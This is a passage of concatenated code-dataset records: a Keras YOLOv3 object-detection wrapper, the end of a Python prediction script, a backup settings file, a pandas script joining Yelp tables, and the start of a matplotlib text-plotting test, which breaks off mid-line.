读入测试数据\n print('Loading test data...')\n logging.info('Loading test data...')\n # 根据配置文件加载测试集\n with open(config_dict[\"test_path\"], 'rb') as f: # test_path是测试数据路径\n test_data = cPickle.load(f)\n '''\n 测试集test_data是一个自定义类Corpus的实例化对象\n Corpus类在sr/shared/classes.py中定义\n Corpus包含Topic;Topic包含Document(以及E和V指称);Document包含Sentence\n Sentence包含Token(以及真实的和预测的E和V指称);...\n '''\n print('Test data have been loaded.')\n logging.info('Test data have been loaded.')\n\n # 运行算法进行测试\n test_model(test_data) # test_model这玩意是上边定义的函数\n\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"src/all_models/predict_model0.py","file_name":"predict_model0.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"375008265","text":"# -*- coding: utf-8 -*-\n\"\"\"\nClass definition of YOLO_v3 style detection model on image and video\n\"\"\"\n\nimport os\nimport cv2\nimport colorsys\nfrom timeit import default_timer as timer\n\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\nfrom keras.utils import multi_gpu_model\nfrom PIL import Image, ImageFont, ImageDraw\nimport tensorflow as tf\n\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\nCWD = os.getcwd()\nif CWD == THIS_DIR:\n from yolo3.model import yolo_eval, yolo_eval_batch, yolo_body, tiny_yolo_body\n from yolo3.utils import letterbox_image\nelse:\n from .yolo3.model import yolo_eval, yolo_eval_batch, yolo_body, tiny_yolo_body\n from .yolo3.utils import letterbox_image\n\nKERAS_YOLO_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass YOLO(object):\n _defaults = {\n # \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolov3-tiny.h5'),\n \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolov3.h5'),\n # \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/pp_reanchored_best_train.h5'),\n # \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/pp_reanchored_best_val.h5'),\n # \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/tiny_yolo_anchors.txt'),\n # \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/PP_ALL_anchors.txt'),\n \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolo_anchors.txt'),\n \"classes_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/coco_classes.txt'),\n # \"classes_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/PP_classes.txt'),\n \"score\" : 0.5,\n \"iou\" : 0.45,\n # \"model_image_size\" : (288, 512), # Height, Width\n \"model_image_size\" : (608, 608),# Height, Width\n # \"input_image_size\" : (1080, 1920), # Height, Width\n \"gpu_num\" : 1,\n \"batch_size\" : 1,\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n def __init__(self, bgr, pillow=False, gpu_usage = 0.5, old=False, gpu_device='cuda:0', **kwargs):\n '''\n Params\n ------\n - bgr : Boolean, signifying if the inputs is bgr or rgb (if you're using cv2.imread it's probably in BGR) \n - pillow : Boolean, flag to give inputs in pillow format instead of ndarray-like, this will override bgr flag to False\n - batch_size : int, inference batch size (default = 1)\n - gpu_device : str, device string from forms\n '''\n self.__dict__.update(self._defaults) # set up default values\n self.__dict__.update(kwargs) # and update with user overrides\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.bgr = bgr\n self.pillow = pillow\n if self.pillow:\n self.bgr = False\n # config = tf.ConfigProto()\n # config.gpu_options.allow_growth=True\n # config.gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_usage)\n dev_splits = gpu_device.split(':')\n dev = dev_splits[0]\n if dev == 'cuda':\n self.device_idx = dev_splits[-1]\n self.device_str = \"/device:GPU:{}\".format(self.device_idx)\n else: # cpu\n self.device_idx = \"-1\"\n self.device_str = \"/device:CPU:0\"\n self.device = gpu_device\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_device\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_usage)\n # sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=True, allow_soft_placement = True))\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement = True))\n K.set_session(sess)\n self.sess = K.get_session()\n self.boxes, self.scores, self.classes = self.generate(old=old)\n self.graph = tf.get_default_graph()\n print('Keras Yolov3 started at batch size of {} and confidence threshold of {}, using gpu device {}, bgr is {}, pillow is {}.'.format(self.batch_size, self.score, self.device_str, self.bgr, self.pillow))\n print('Model input size {}'.format(self.model_image_size))\n # self.boxes, self.scores, self.classes = self.generate()\n warmup_height, warmup_width = self.model_image_size # Height, Width\n warmup_image = np.zeros((warmup_height,warmup_width,3), dtype='uint8')\n print('Warming up...')\n self._detect_batch([warmup_image] * self.batch_size, warmup_width, warmup_height)\n print('YOLO warmed up!')\n # print('Input image size initialised as {}x{} (WxH)! Please give the appropriate argument inputs if this is wrong.'.format(self.input_image_size[1], self.input_image_size[0]))\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n\n def generate(self, old = False):\n model_path = os.path.expanduser(self.model_path)\n assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'\n\n # Load model, or construct model and load weights.\n num_anchors = len(self.anchors)\n num_classes = len(self.class_names)\n is_tiny_version = num_anchors==6 # default setting\n with tf.device(self.device_str):\n try:\n self.yolo_model = load_model(model_path, compile=False)\n except:\n self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \\\n if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)\n self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match\n else:\n assert self.yolo_model.layers[-1].output_shape[-1] == \\\n num_anchors/len(self.yolo_model.output) * (num_classes + 5), \\\n 'Mismatch between model and given anchor and class sizes'\n\n print('{} model, anchors, and classes loaded.'.format(model_path))\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.\n np.random.seed(None) # Reset seed to default.\n\n with tf.device(self.device_str):\n # Generate output tensor targets for filtered bounding boxes.\n self.input_image_shape = K.placeholder(shape=(2, ))\n if self.gpu_num>=2:\n self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)\n\n with tf.device(self.device_str):\n if old:\n print('using old yolo eval')\n boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape,\n score_threshold=self.score, iou_threshold=self.iou)\n else:\n boxes, scores, classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape, self.batch_size,\n score_threshold=self.score, iou_threshold=self.iou)\n return boxes, scores, classes\n # return boxes, scores, classes\n\n def _refresh(self, batch_size):\n self.batch_size = batch_size\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.\n np.random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n self.input_image_shape = K.placeholder(shape=(2, ))\n if self.gpu_num>=2:\n self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)\n\n # boxes, scores, classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n # len(self.class_names), self.input_image_shape, batch_size=2,\n # score_threshold=self.score, iou_threshold=self.iou)\n # boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n # len(self.class_names), self.input_image_shape,\n # score_threshold=self.score, iou_threshold=self.iou)\n\n self.boxes, self.scores, self.classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape, self.batch_size,\n score_threshold=self.score, iou_threshold=self.iou)\n\n def regenerate(self, batch_size):\n if batch_size == self.batch_size:\n return\n self._refresh(batch_size)\n warmup_height, warmup_width = self.model_image_size # Height, Width\n\n warmup_image = np.zeros((warmup_height,warmup_width,3), dtype='uint8')\n print('Warming up...')\n self._detect_batch([warmup_image] * self.batch_size, warmup_width, warmup_height)\n print('YOLO warmed up!')\n\n def _preprocess(self, image, expand=True):\n '''\n Params\n ------\n image : ndarray-like or PIL image (in that case, self.pillow better be True)\n expand : Boolean, usually True for single image cases\n\n Returns\n -------\n ndarray-like\n '''\n if isinstance(image, np.ndarray):\n if self.bgr: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = Image.fromarray( image )\n else:\n assert isinstance(image, Image.Image),'image not a PIL.Image.Image!' \n \n if self.model_image_size != (None, None):\n assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))\n else:\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n image_data /= 255.\n if expand:\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n return image_data\n\n def _detect(self, image):\n image_data = self._preprocess(image)\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.shape[0], image.shape[1]], # height, width\n K.learning_phase(): 0\n })\n return out_boxes, out_scores, out_classes\n\n def _preprocess_batch(self, images):\n # images_data = np.array( [self._preprocess(image) for image in images] )\n images_data = np.zeros((len(images),*self.model_image_size,3))\n for i, image in enumerate(images):\n if image is not None:\n images_data[i] = self._preprocess( image, expand=False )\n return images_data\n\n def _detect_batch(self, images, im_width, im_height):\n '''\n detect function \n\n Params\n ------\n images : list of ndarrays\n im_width : width of image\n im_height : height of image\n\n '''\n if len( images ) <= 0:\n return None\n # assert all([images[0].shape == img.shape for img in images[1:]]),'Network does not acccept images of different sizes. please speak to evan.'\n\n # assert len(images) <= self.batch_size,'Length of image batch given ({}) is bigger than what network was initialised as ({}).'.format(len(images), self.batch_size)\n # assert len(images) == self.batch_size,'Length of image batch given ({}) different from what network was initialised as ({}).'.format(len(images), self.batch_size)\n if len(images) < self.batch_size:\n images.extend([None]*int(self.batch_size - len(images)))\n assert len(images) == self.batch_size\n images_data = self._preprocess_batch(images)\n with self.graph.as_default():\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: images_data,\n self.input_image_shape: [im_height, im_width], # height, width\n # self.input_image_shape: [images[0].shape[0], images[0].shape[1]], # height, width\n # self.input_image_shape: [self.input_image_size[0], self.input_image_size[1]], # height, width\n K.learning_phase(): 0\n })\n return out_boxes, out_scores, out_classes\n # return out_boxes, out_scores, out_classes\n\n def detect_get_box_in(self, images, box_format='ltrb', classes=None, buffer_ratio=0.):\n '''\n Params\n ------\n - images : ndarray-like or list of ndarray-like\n - box_format : string of characters representing format order, where l = left, t = top, r = right, b = bottom, w = width and h = height\n - classes : list of string, classes to focus on\n - buffer : float, proportion of buffer around the width and height of the bounding box\n\n Returns\n -------\n if one ndarray given, this returns a list (boxes in one image) of tuple (box_infos, score, predicted_class),\n \n else if a list of ndarray given, this return a list (batch) containing the former as the elements,\n\n where,\n - box_infos : list of floats in the given box format\n - score : float, confidence level of prediction\n - predicted_class : string\n\n '''\n \n no_batch = False\n if isinstance(images, list):\n if len(images) <= 0 : \n return None\n # else:\n # assert isinstance(images[0], np.ndarray)\n # if all([images[0].shape == img.shape for img in images[1:]]):\n # print('WARNING from yolo module: Input images in batch are of diff sizes, the input size will take the first image in the batch, you will have to scale the output bounding boxes of those input image whose sizes differ from the first image yourself.')\n # assert all([images[0].shape == img.shape for img in images[1:]]),'Network does not acccept images of different sizes. please speak to eugene.'\n elif isinstance(images, np.ndarray):\n images = [ images ]\n no_batch = True\n \n if isinstance(images[0], np.ndarray):\n im_height, im_width = images[0].shape[:2]\n else:\n assert isinstance(images[0], Image.Image)\n im_width, im_height = images[0].size\n\n # import time\n # tic = time.time()\n all_out_boxes = []\n all_out_scores = []\n all_out_classes = []\n for i in range( int(np.ceil(len(images)/self.batch_size)) ):\n from_ = i*self.batch_size\n to_ = min(len(images),i*self.batch_size+self.batch_size)\n n = to_ - from_ \n # print('Inferencing {} images'.format(n))\n out_boxes, out_scores, out_classes = self._detect_batch(images[from_:to_],im_width, im_height)\n all_out_boxes.extend(out_boxes[:n])\n all_out_scores.extend(out_scores[:n])\n all_out_classes.extend(out_classes[:n])\n # tic2 = time.time()\n all_dets = []\n for out_boxes, out_scores, out_classes in zip(all_out_boxes, all_out_scores, all_out_classes):\n dets = []\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c]\n if classes is not None and predicted_class not in classes:\n continue\n score = out_scores[i]\n box = out_boxes[i]\n\n top, left, bottom, right = box\n\n width = right - left + 1\n height = bottom - top + 1\n width_buffer = width * buffer_ratio\n height_buffer = height * buffer_ratio\n \n top = max( 0.0, top-0.5*height_buffer )\n left = max( 0.0, left-0.5*width_buffer )\n bottom = min( im_height - 1.0, bottom + 0.5*height_buffer )\n right = min( im_width - 1.0, right + 0.5*width_buffer )\n\n box_infos = []\n for c in box_format:\n if c == 't':\n box_infos.append( int(round(top)) ) \n elif c == 'l':\n box_infos.append( int(round(left)) )\n elif c == 'b':\n box_infos.append( int(round(bottom)) )\n elif c == 'r':\n box_infos.append( int(round(right)) )\n elif c == 'w':\n box_infos.append( int(round(width+width_buffer)) )\n elif c == 'h':\n box_infos.append( int(round(height+height_buffer)) )\n else:\n assert False,'box_format given in detect unrecognised!'\n assert len(box_infos) > 0 ,'box infos is blank'\n\n dets.append( (box_infos, score, predicted_class) )\n # dets.append((top, left, bottom, right) (predicted_class, score, ) )\n all_dets.append(dets)\n # tic3 = time.time()\n # print('Batch Forward pass: {}s'.format(tic2 - tic))\n # print('Post proc: {}s'.format(tic3 - tic2))\n if no_batch:\n return all_dets[0]\n else:\n return all_dets\n\n def detect_ltwh(self, np_image, classes=None, buffer=0.):\n raise Exception('This method has been deprecated, please use detect_get_box_in for a more general method.')\n '''\n detect method\n\n Params\n ------\n np_image : ndarray\n\n Returns\n ------\n list of triples ([left, top, width, height], score, predicted_class)\n\n '''\n # image = Image.fromarray(np_image)\n # if self.model_image_size != (None, None):\n # assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'\n # assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'\n # boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))\n # else:\n # new_image_size = (image.width - (image.width % 32),\n # image.height - (image.height % 32))\n # boxed_image = letterbox_image(image, new_image_size)\n # image_data = np.array(boxed_image, dtype='float32')\n\n # image_data /= 255.\n # image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n # image_data = self.preprocess(image)\n\n # out_boxes, out_scores, out_classes = self.sess.run(\n # [self.boxes, self.scores, self.classes],\n # feed_dict={\n # self.yolo_model.input: image_data,\n # self.input_image_shape: [image.size[1], image.size[0]],\n # K.learning_phase(): 0\n # })\n\n # image_data = self.preprocess(image)\n # out_boxes, out_scores, out_classes = self.sess.run(\n # [self.boxes, self.scores, self.classes],\n # feed_dict={\n # self.yolo_model.input: image_data,\n # self.input_image_shape: [image_data.shape[0], image_data.shape[1]], # height, width\n # K.learning_phase(): 0\n # })\n\n # dets = []\n\n # for i, c in reversed(list(enumerate(out_classes))):\n # predicted_class = self.class_names[c]\n # if classes is not None and predicted_class not in classes:\n # continue\n\n # score = out_scores[i]\n # box = out_boxes[i]\n # top, left, bottom, right = box\n # width = right - left + 1\n # height = bottom - top + 1\n # width_buf = (width) * buffer\n # height_buf = (height) * buffer\n # top = max(0, np.floor(top + 0.5 - height_buf).astype('int32'))\n # left = max(0, np.floor(left + 0.5 - width_buf).astype('int32'))\n # bottom = min(image.size[1], np.floor(bottom + 0.5 + height_buf).astype('int32'))\n # right = min(image.size[0], np.floor(right + 0.5 + width_buf).astype('int32'))\n\n # dets.append( ([left, top, width, height], score, predicted_class) )\n\n # return dets\n\n def detect_path(self, path, box_format='ltrb', classes=None):\n img = cv2.imread(path)\n assert self.pillow == False,'Please initialise this object with pillow = False'\n assert self.bgr == True,'Please initialise this object with bgr = True'\n # print('WARNING: pillow set to False and bgr set to True, do not use this yolo object for anything else.')\n dets = self.detect_get_box_in(img, box_format='ltrb', classes=classes)\n return dets\n\n # def detect_persons(self, image, classes=None, buf=0.):\n # return self.detect( image, classes=['person'], buffer=buf )\n\n def get_detections_dict(self, frames, classes=None, buffer_ratio=0.0):\n '''\n Params: frames, list of ndarray-like\n Returns: detections, list of dict, whose key: label, confidence, t, l, w, h\n '''\n if frames is None or len(frames) == 0:\n return None\n all_dets = self.detect_get_box_in( frames, box_format='tlbrwh', classes=classes, buffer_ratio=buffer_ratio )\n \n all_detections = []\n for dets in all_dets:\n detections = []\n for tlbrwh,confidence,label in dets:\n top, left, bot, right, width, height = tlbrwh\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n detections.append( {'label':label,'confidence':confidence,'t':top,'l':left,'b':bot,'r':right,'w':width,'h':height} ) \n all_detections.append(detections)\n return all_detections\n\n def get_triple_detections(self, frame, classes=None):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # '''\n # Params\n # ------\n # frame : np array\n \n # Returns\n # ------\n # list\n # List of triples ( [left,top,w,h] , confidence, detection_class)\n\n # '''\n # if frame is None:\n # return None\n # image = Image.fromarray( frame )\n # dets = self.detect( image, classes=classes )\n # detections = []\n # for label, confidence, tlbr in dets:\n # top = tlbr[0]\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n # detections.append( ([left, top, width, height], confidence, label) ) \n # return detections\n\n # for reid PERSON ONLY\n def get_detections_batch(self, frames):\n # TODO: BATCH INFER THIS SHIT\n all_detections = []\n for frame in frames:\n if frame is None:\n all_detections.append([])\n continue\n curr_detections = self.get_detections_dict(frame, classes=['person'])\n # image = Image.fromarray( frame )\n # dets = self.detect_get_box_in( image, classes=['person'] )\n # curr_detections = []\n # for label, confidence, tlbr in dets:\n # top = tlbr[0]\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n # tlwh = {'t':top, 'l':left, 'w':width, 'h':height}\n # curr_detections.append( {'label':label, 'confidence':confidence, 'tlwh':tlwh} )\n all_detections.append(curr_detections)\n return all_detections\n\n def crop_largest_person(self, image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # dets = self.detect( image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for _,_,tlbr in dets:\n # if largest_det is None:\n # largest_det = tlbr\n # else:\n # detarea = (tlbr[3]-tlbr[1]) * (tlbr[2]-tlbr[0])\n # ldarea = (largest_det[3]-largest_det[1]) * (largest_det[2]-largest_det[0])\n # if detarea > ldarea:\n # largest_det = tlbr\n\n # if largest_det is not None:\n # # crop image\n # min_x = largest_det[1]\n # min_y = largest_det[0]\n # max_x = largest_det[3]\n # max_y = largest_det[2]\n # return image.crop( (min_x, min_y, max_x, max_y) )\n # return image\n\n def get_largest_person(self, np_image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # # image = Image.fromarray(np_image)\n # dets = self.detect_ltwh( np_image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for det in dets:\n # if largest_det is None:\n # largest_det = det\n # else:\n # detarea = det[0][2] * det[0][3]\n # ldarea = largest_det[0][2] * largest_det[0][3]\n # if detarea > ldarea:\n # largest_det = det\n # return largest_det\n\n def get_largest_person_and_bb(self, np_image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # image = Image.fromarray(np_image)\n # dets = self.detect( image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for _,_,tlbr in dets:\n # if largest_det is None:\n # largest_det = tlbr\n # else:\n # detarea = (tlbr[3]-tlbr[1]) * (tlbr[2]-tlbr[0])\n # ldarea = (largest_det[3]-largest_det[1]) * (largest_det[2]-largest_det[0])\n # if detarea > ldarea:\n # largest_det = tlbr\n\n # if largest_det is not None:\n # # crop image\n # min_x = largest_det[1]\n # min_y = largest_det[0]\n # max_x = largest_det[3]\n # max_y = largest_det[2]\n # return np.array(image.crop( (min_x, min_y, max_x, max_y) )), largest_det\n # return None, None\n\n def close_session(self):\n self.sess.close()\n\ndef detect_video(yolo, video_path, output_path=\"\"):\n import cv2\n vid = cv2.VideoCapture(video_path)\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))\n video_fps = vid.get(cv2.CAP_PROP_FPS)\n video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n isOutput = True if output_path != \"\" else False\n if isOutput:\n print(\"!!! TYPE:\", type(output_path), type(video_FourCC), type(video_fps), type(video_size))\n out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)\n accum_time = 0\n curr_fps = 0\n fps = \"FPS: ??\"\n prev_time = timer()\n while True:\n return_value, frame = vid.read()\n image = Image.fromarray(frame)\n image = yolo.detect_image(image)\n result = np.asarray(image)\n curr_time = timer()\n exec_time = curr_time - prev_time\n prev_time = curr_time\n accum_time = accum_time + exec_time\n curr_fps = curr_fps + 1\n if accum_time > 1:\n accum_time = accum_time - 1\n fps = \"FPS: \" + str(curr_fps)\n curr_fps = 0\n cv2.putText(result, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.50, color=(255, 0, 0), thickness=2)\n cv2.namedWindow(\"result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"result\", result)\n if isOutput:\n out.write(result)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n yolo.close_session()\n\nif __name__ == '__main__':\n import cv2\n import time\n # yolo = YOLO(bgr=True, batch_size=1)\n \n # img = cv2.imread('/home/dh/Pictures/frisbee.jpg')\n # img2 = cv2.imread('/home/dh/Pictures/dog_two.jpg')\n # img2 = cv2.resize(img2, (img.shape[1], img.shape[0]))\n # img3 = cv2.imread('/home/dh/Pictures/puppy-dog.jpg')\n # img3 = cv2.resize(img3, (img.shape[1], img.shape[0]))\n\n # img_batch = [img]\n # # img_batch = [img, img2]\n # # img_batch = [img, img2, img3]\n\n # all_dets = yolo.detect_get_box_in(img_batch, box_format='ltrb')\n # # boxes, scores, classes = yolo._detect_batch(img_batch)\n # for dets, im in zip(all_dets, img_batch):\n # im_show = im.copy()\n # for det in dets:\n # # print(det)\n # ltrb, conf, clsname = det\n # l,t,r,b = ltrb\n # cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n # print('{}:{}'.format(clsname, conf))\n # cv2.imshow('',im_show)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # print('REDO with diff batch size')\n\n # img_batch = [img, img2, img3]\n # yolo.regenerate(batch_size=len(img_batch))\n # all_dets = yolo.detect_get_box_in(img_batch, box_format='ltrb')\n # for dets, im in zip(all_dets, img_batch):\n # im_show = im.copy()\n # for det in dets:\n # # print(det)\n # ltrb, conf, clsname = det\n # l,t,r,b = ltrb\n # cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n # print('{}:{}'.format(clsname, conf))\n # cv2.imshow('',im_show)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # numstreams = 1\n ip = 'test.jpg'\n img = cv2.imread(ip)\n # vp = '/media/dh/HDD/reid/street_looped.mp4'\n # cap = cv2.VideoCapture(vp)\n # caps = []\n # for _ in range(numstreams):\n # caps.append(cv2.VideoCapture(vp))\n \n bs = 1\n imgs = [ img for _ in range(bs)]\n yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(608, 608))\n # yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(896, 896))\n # yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(896, 512))\n\n # frame_idx = 0\n # while True:\n # frames = []\n # for cap in caps:\n # ret, frame = cap.read()\n # if not ret:\n # break\n # frames.append(frame)\n # # frames = [frame] * numstreams\n # frame_idx += 1\n # if (frame_idx-1)%10:\n tic = time.perf_counter()\n all_dets = yolo.detect_get_box_in(imgs, box_format='ltrb')\n toc = time.perf_counter()\n print('infer time:', toc-tic)\n # for dets, im in zip(all_dets, frames):\n # im_show = frame.copy()\n im_show = img.copy()\n for det in all_dets[0]:\n # print(det)\n ltrb, conf, clsname = det\n l,t,r,b = ltrb\n cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n cv2.putText(im_show, '{:0.2f}'.format(conf), (l,b), cv2.FONT_HERSHEY_DUPLEX, fontScale=1, color=(255,255,0), lineType=2)\n # print('{}:{}'.format(clsname, conf))\n cv2.imwrite('test_out.jpg', im_show)\n # cv2.imshow('',im_show)\n # if cv2.waitKey(1) == ord('q'):\n # break\n # cv2.destroyAllWindows()\n","sub_path":"yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":33129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271253276","text":"'''\n Settings.py\n This is where I am going to define the settings for the whole thing.\n\n Below is an example specifications dictionary.\n\n'''\n\nspecifications = {\n 'number_of_backups': 3,\n 'source_file_name': \"backup.txt\",\n 'extension': 'txt',\n 'prefix': 'backup_',\n 'source_dir': 'C:\\\\back_up',\n 'dest_dir': 'C:\\\\back_up_dest',\n }\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"39041862","text":"# Kevin Enario\n# Data integration of all 5 tables\n# MULTI STEP PROCESS DUE TO LARGE DATA\n\n# native imports\n\n# third party imports\nimport pandas as pd\n\n# engineer data\ndef main():\n join_tip_user()\n # join_bus_check_tip() \n\ndef join_tip_user():\n dfTip = pd.read_csv('csv/yelp_tip_dataset.csv')\n dfUser = pd.read_csv('csv/yelp_user_dataset.csv')\n\n # drop column\n dfTip = dfTip.drop('Unnamed: 0', axis=1)\n\n toJoin = dfTip.merge(dfUser, how='left', on='user_id')\n print(toJoin.dtypes)\n\ndef join_bus_check_tip():\n dfBus = pd.read_csv('csv/yelp_business_dataset_transformed.csv')\n dfCheck = pd.read_csv('csv/yelp_checkin_dataset.csv')\n dfTip = pd.read_csv('csv/yelp_tip_dataset.csv') \n\n # drop column\n dfBus = dfBus.drop(['address', 'attributes', 'hours'], axis=1)\n dfCheck = dfCheck.drop('Unnamed: 0', axis=1) \n\n # join\n toJoin = dfBus.merge(dfCheck, how='left', on='business_id').merge(dfTip, how='left', on='business_id')\n\n # reduce\n \n # test\n print(toJoin.dtypes)\n # print(toJoin[['name', 'text']].head(50))\n\n # convert to csv\n # toJoin.to_csv('csv/bus_check_tip.csv', index=False) \n\n\n#################################################### run main ###########################################\nif __name__ == '__main__':\n main()","sub_path":"dataPreprocessing/integratedDataset/joinDataset.py","file_name":"joinDataset.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"545779519","text":"# -*- coding: utf-8 -*-\n#\nimport helpers\n\nimport matplotlib.pyplot as plt\nimport numpy\n\n\ndef plot():\n fig = plt.figure()\n\n xxx = numpy.linspace(0, 5)\n yyy = xxx**2\n plt.text(\n 1, 5, 'test1', size=50, rotation=30.,\n ha='center', va='bottom', color='r', style='italic',\n weight='light',\n bbox=dict(\n boxstyle='round, pad=0.2',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n ls='dashdot'\n )\n )\n plt.text(\n 3, 6, 'test2', size=50, rotation=-30.,\n ha='center', va='center', color='b', weight='bold',\n bbox=dict(\n boxstyle='square',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.text(\n 4, 8, 'test3', size=20, rotation=90.0,\n ha='center', va='center', color='b', weight='demi',\n bbox=dict(\n boxstyle='rarrow',\n ls='dashed',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.text(\n 4, 16, 'test4', size=20, rotation=90.0,\n ha='center', va='center', color='b', weight='heavy',\n bbox=dict(\n boxstyle='larrow',\n ls='dotted',\n ec=(1., 0.5, 0.5),\n fc=(1., 